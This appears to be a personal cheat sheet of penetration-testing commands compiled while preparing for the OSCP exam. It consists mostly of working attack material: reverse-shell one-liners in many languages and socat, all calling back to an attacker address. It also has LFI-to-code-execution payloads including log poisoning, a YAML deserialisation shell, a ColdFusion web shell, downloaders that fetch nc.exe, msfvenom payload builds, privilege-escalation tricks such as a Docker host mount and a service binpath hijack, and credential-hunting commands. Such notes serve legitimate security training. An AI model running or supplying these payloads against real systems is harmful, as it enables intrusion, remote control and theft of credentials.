Collection of commands, tips and tricks and references I found useful during preparation for OSCP exam.
nmap -sn 10.11.1.0/24
nbtscan -r 10.11.1.0/24
dnsrecon -r 10.11.1.0/24 -n <DNS IP>
nmap -sV -sT -p- <target IP>
xprobe2 <target IP>
nmap --script-args=unsafe=1 --script smb-check-vulns.nse -p 445 target
nmap -p139,445 <target IP> --script smb-vuln*
enum4linux -a <target IP>
enum4linux -a -u <user> -p <passwd> <targetIP>
gobuster -u http://<target IP> -w /usr/share/dirb/wordlists/big.txt
nikto -host http://<target IP>
- Unsafe YAML parsing may allow creation of Python objects and as a result remote code execution
!!python/object/apply:os.system ["bash -i >& /dev/tcp/yourIP/4444 0>&1"]
- Check for LFI
Add /etc/passwd%00 to any GET/POST arguments. On windows try C:\Windows\System32\drivers\etc\hosts%00 or C:\autoexec.bat%00.
A quick win could also be any of these files c:\sysprep.inf, c:\sysprep\sysprep.xml or c:\unattend.xml as they would contain local admin credentials. On linux it's worth checking /proc/self/environ to see if there are any credentials passed to the running process via env vars.
- Fetching .php files via LFI
/index.php?somevar=php://filter/read=convert.base64-encode/resource=<file path>%00 this will return base64 encoded PHP file. Good for fishing up config.php or similar.
-
Abusing /proc/self/environ LFI to gain reverse shell In some situations it's possible to abuse
/proc/self/environto execute a command. For example:index.php?somevar=/proc/self/environ&cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<your IP>",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' -
Apache access.log + LFI = PHP injection If Apache logs can be accessed via LFI it may be possible to use it to our advantage by injecting any PHP code in it and then viewing it via LFI.
with netcat send a request like this:
GET /<?php system($_GET["cmd"]);?>
-
auth.log + LFI
ssh <?php system($_GET["cmd"]);?>@targetIPand then LFI/var/log/auth.log -
/var/mail + LFI
mail -s "<?php system($_GET["cmd"]);?>" someuser@targetIP < /dev/null -
php expect
index.php?somevar=expect://ls -
php input
curl -X POST "targetIP/index.php?somevar=php://input" --data '<?php system("curl -o cmd.php yourIP/cmd.txt");?>'Then accesstargetIP/cmd.php
-
is it Enterprise or Community?
Check how it handles.jspfilescurl targetIP/blah/blah.jsp. If 404 - enterprise, 500 - community. -
which version?
/CFIDE/adminapi/base.cfc?wsdlhas a useful comment indicating exact version -
LFI in admin login locale
/CFIDE/administrator/enter.cfm?locale=../../../../ColdFusion9\lib\password.properties- may need full path. They can be obtained with help of/CFIDE/componentutils/cfexplorer.cfc -
Local upload and execution
Once access to admin panel is gained it's possible to use the task scheduler to download a file and use a system probe to execute it.
Debugging & Logging -> Scheduled Tasks -> url=, Publish - save output to file (some writable path). Then manually execute this task which will download and save our file.
To execute it create a probe Debugging & Logging -> System probes -> URL=, Probe fail - fail if probe does not contain "blahblah", Execute program . And then run probe manually.
-
Files worth grabbing
- CF7 \lib\neo-query.xml
- CF8 \lib\neo-datasource.xml
- CF9 \lib\neo-datasource.xml
-
Simple remote CFM shell
<html>
<body>
<cfexecute name = "#URL.runme#" arguments =
"#URL.args#" timeout = "20">
</cfexecute>
</body>
</html>
- Simple remote shell using Java (if CFEXECUTE is disabled)
<cfset runtime = createObject("java",
"java.lang.System")>
<cfset props = runtime.getProperties()>
<cfdump var="#props#">
<cfset env = runtime.getenv()>
<cfdump var="#env#">
-
generic dirbusting
gobuster -u targetIP -w /usr/share/dirb/wordlists/big.txt -
fuzz some cgi
gobuster -u targetIP -w /usr/share/seclists/Discovery/Web_Content/cgis.txt -s 200
-
Bash
bash -i >& /dev/tcp/yourIP/4444 0>&1 -
Perl Linux
perl -e 'use Socket;$i="yourIP";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' -
Perl Windows
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"yourIP:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' -
Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("yourIP",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' -
PHP
php -r '$sock=fsockopen("yourIP",4444);exec("/bin/sh -i <&3 >&3 2>&3");' -
Ruby
ruby -rsocket -e'f=TCPSocket.open("yourIP",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' -
Java (Linux)
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/yourIP/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
- Groovy
String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());
while(pe.available()>0)so.write(pe.read());
while(si.available()>0)po.write(si.read());
so.flush();po.flush();
Thread.sleep(50);
try {p.exitValue();
break;
}catch (Exception e){}};
p.destroy();
s.close();
- xterm
xterm -display yourIP:1
And on your side authorize the connection with xhost +targetIp and catch it with Xnest :1
- socat
Listener:
socat file:`tty`,raw,echo=0 yourIP:4444
target:
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:yourIP:4444
- Python (Linux)
python -c 'import pty; pty.spawn("/bin/bash")'
Then Ctrl-Z back to local shell and stty raw -echo, then back to remote shell with fg and set terminal with export TERM=xterm.
-
Python (Windows)
c:\python26\python.exe -c 'import pty; pty.spawn("c:\\windows\\system32\\cmd.exe")' -
Expect
sh.exp
#!/usr/bin/expect
spawn sh
interact
- Script
script /dev/null
-
Get version
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" -
Get users
net users -
Get user info
net user <username> -
Check local connections and listening ports (compare with nmap scan to see if there are any hidden ports)
netstat -ano -
Firewall status
netsh firewall show state
netsh firewall show config -
Scheduled tasks
List -schtasks /query /fo LIST /v
Create -schtasks /Create /TN mytask /SC MINUTE /MO 1 /TR "mycommands"
Run -schtasks /Run /TN mytask
Delete -schtasks /Delete /TN mytask -
Running tasks
List -tasklist /SVC
Kill -taskkill /IM <exe name> /F
Kill -taskkill /PID <pid> /F -
Services
List -net start
Long name to key namesc getkeyname "long name"
Details -sc qc <key name>
Config -sc config <key name> -
Low hanging fruits to grab
c:\sysprep.inf
c:\sysprep\sysprep.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml
-
Installers are running as elevated?
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated -
Find interesting files
dir /s *pass* == *cred* == *vnc* == *.config*
findstr /si password *.xml *.ini *.txt -
Find interesting registry entries
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s -
Permissions
Check detail on service -accesschk.exe /accepteula -ucqv <service name>
Find modifiable services -accesschk.exe /accepteula -uwcqv "Authenticated Users" *
accesschk.exe /accepteula -uwcqv "Users" *
Folder permissions -accesschk.exe -dqv <path>
cacls <path>
icacls <path\file -
Qick win on WinXP SP0/1
sc config upnphost binpath= "C:\nc.exe -nv yourIP 4444 -e C:\WINDOWS\System32\cmd.exe"
sc config upnphost obj= ".\LocalSystem" password= ""
sc config upnphost depend= ""
net stop upnphost
net start upnphost -
Quick wins
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"
reg query" HKCU\Software\SimonTatham\PuTTY\Sessions"
reg query "HKCU\Software\ORL\WinVNC3\Password" -
Download file with VBS
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", "http://yourIp/nc.exe", False
xHttp.Send
with bStrm
.type = 1 \'//binary
.open
.write xHttp.responseBody
.savetofile "C:\\Users\\Public\\nc.exe", 2 \'//overwrite
end with
-
Download with Powershell 3+
powershell -NoLogo -Command "Invoke-WebRequest -Uri 'https://yourIP/nc.exe' -OutFile 'c:\Users\Public\Downloads\nc.exe'" -
Download with Powershell 2
powershell -NoLogo -Command "$webClient = new-object System.Net.WebClient; $webClient.DownloadFile('https://yourIP/nc.exe', 'c:\Users\Public\Download\nc.exe')" -
Download with Python
c:\Python26\python.exe -c "import urllib; a=open('nc.exe', 'wb'); a.write(urllib.urlopen('http://yourIP/nc.exe').read()); a.flush();a.close()" -
Windows specific LPE vulns
- https://www.exploit-db.com/exploits/11199/
- https://www.exploit-db.com/exploits/18176/
- https://www.exploit-db.com/exploits/15609/
- https://www.securityfocus.com/bid/42269/exploit
- https://www.securityfocus.com/bid/46136/exploit
- Basic enumeration
System info
uname -a
Arch
uname -m
Kernel
cat /proc/version
Distro
cat /etc/*-release or cat /etc/issue
Filesystem
df -a
Users
cat /etc/passwd
Groups
cat /etc/group
Super accounts
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}'
Currently logged in
finger, w, who -a, pinky, users
Last logged users
last, lastlog
Cheeky test -
sudo -l
Anything interesting we can run as sudo?
sudo -l 2>/dev/null | grep -w 'nmap|perl|awk|find|bash|sh|man|more|less|vi|vim|nc|netcat|python|ruby|lua|irb' | xargs -r ls -la 2>/dev/null
History -
history
Env vars
env
Available shells
cat /etc/shells
SUID files
find / -perm -4000 -type f 2>/dev/null
SUID owned by root
find / -uid 0 -perm -4000 -type f 2>/dev/null
GUID files
find / -perm -2000 -type f 2>/dev/null
World writable
find / -perm -2 -type f 2>/dev/null
World writable executed
find / ! -path "*/proc/*" -perm -2 -type f -print 2>/dev/null
World writable dirs
find / -perm -2 -type d 2>/dev/null
rhost files
find /home –name *.rhosts -print 2>/dev/null
Plan files
find /home -iname *.plan -exec ls -la {} ; -exec cat {} 2>/dev/null ;
hosts.equiv
find /etc -iname hosts.equiv -exec ls -la {} 2>/dev/null ; -exec cat {} 2>/dev/null ;
Can we peek at /root?
ls -ahlR /root/
Find ssh files
find / -name "id_dsa*" -o -name "id_rsa*" -o -name "known_hosts" -o -name "authorized_hosts" -o -name "authorized_keys" 2>/dev/null |xargs -r ls -la
Inetd
ls -la /usr/sbin/in.*
Grep logs for loot
grep -l -i pass /var/log/*.log 2>/dev/null
What do we have in logs
find /var/log -type f -exec ls -la {} ; 2>/dev/null
Find conf files in /etc
find /etc/ -maxdepth 1 -name *.conf -type f -exec ls -la {} ; 2>/dev/null
as above
ls -la /etc/*.conf
List open files
lsof -i -n
Can we read root mail?
head /var/mail/root
What is running as root?
ps aux | grep root
Lookup paths to running files
ps aux | awk '{print $11}'|xargs -r ls -la 2>/dev/null |awk '!x[$0]++'
Exports and permissions of NFS
ls -la /etc/exports 2>/dev/null; cat /etc/exports 2>/dev/null
List sched jobs
ls -la /etc/cron*
List open connections (run with sudo/as root for more results)
lsof -i
Installed pkgs:
dpkg -l (debian), rpm -qa (RH)
sudo version?
sudo -V
Available compilers
dpkg --list 2>/dev/null| grep compiler |grep -v decompiler 2>/dev/null && yum list installed 'gcc*' 2>/dev/null| grep gcc 2>/dev/null
If you find a privileged bash shell which uses wildcard when iterating over files on folder you can create files in note that you can create files which names will be parsed as arguments to the command that is used to iterate over said files. This opens up interesting attack vector, ie when there's a for loop and inside the loop script executes for example cp on each file. If you create file with touch -- '--someargument' it will be passed to the command as --someargument.
Good example is if such script copies files somewhere. Adding a file named --preserve=mode and also copying /bin/bash in same folder and changing its mode to 4755 will result the script copying bash as a root with suid permissions. Executing that copy of bash with bash -p will result in bash running as root.
Since most likely Docker runs as root if you can execute docker commands as unpriviledged user you can very likely use Docker's privs instead.
docker run --rm -it --pid=host --net=host --privileged -v /:/host ubuntu bash - note that the root folder from host is mounted as /host. You'll also see all processes running on host and be connected to same NICs.
You may want to look into escaping UTS and IPC namespacing with --uts=host --ipc=host
curl -T nc.exe http://targetIP/nc.txt
curl -X MOVE -v -H "Destination:http://targetIP/nc.exe" http://targetIP/nc.txt
msfvenom -l
-
Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf -
Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe -
Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho
-
PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.phpcat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php -
ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp -
JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp -
WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war
-
Python
msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py -
Bash
msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh -
Perl
msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl
For all shellcode see msfvenom –help-formats for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.
-
Linux Based Shellcode
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language> -
Windows Based Shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language> -
Mac Based Shellcode
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
-
CVE-2014-6271
env X='() { :; }; echo "CVE-2014-6271 vulnerable"' bash -c id -
CVE-2014-7169
env X='() { (a)=>\' bash -c "echo date"; cat echo -
CVE-2014-7186
bash -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF' || echo "CVE-2014-7186 vulnerable, redir_stack" -
CVE-2014-7187
(for x in {1..200} ; do echo "for x$x in ; do :"; done; for x in {1..200} ; do echo done ; done) | bash || echo "CVE-2014-7187 vulnerable, word_lineno" -
CVE-2014-6278
env X='() { _; } >_[$($())] { echo CVE-2014-6278 vulnerable; id; }' bash -c :
- OSCP Exam Guide - MUST read!
- The Magic of Learning - a real treasure trove!
- FuzzySecurity - this is something you must bookmark... period. I found the Windows Privilege Escalation Fundamentals especially useful.
- WMIC reference/guide
- SysInternals - this is a must have for working on Windows boxes.
- PowerSploit
- Elevating privileges by exploiting weak folder permissions
- ColdFusion for PenTesters
- ColdFusion Path Traversal
- Penetration Testing Tools Cheat Sheet - Good read. Check out other cheat sheets on this page too!
- fimap - LFI/RFI scanner
- Changeme - default password scanner
- CIRT Default Passwords DB
- From LFI to Shell
- Useful Linux commands
- Local Linux Enumeration
- Creating Metasploid Payloads
- Shellshock PoCs
- GTFOBins
- BustaKube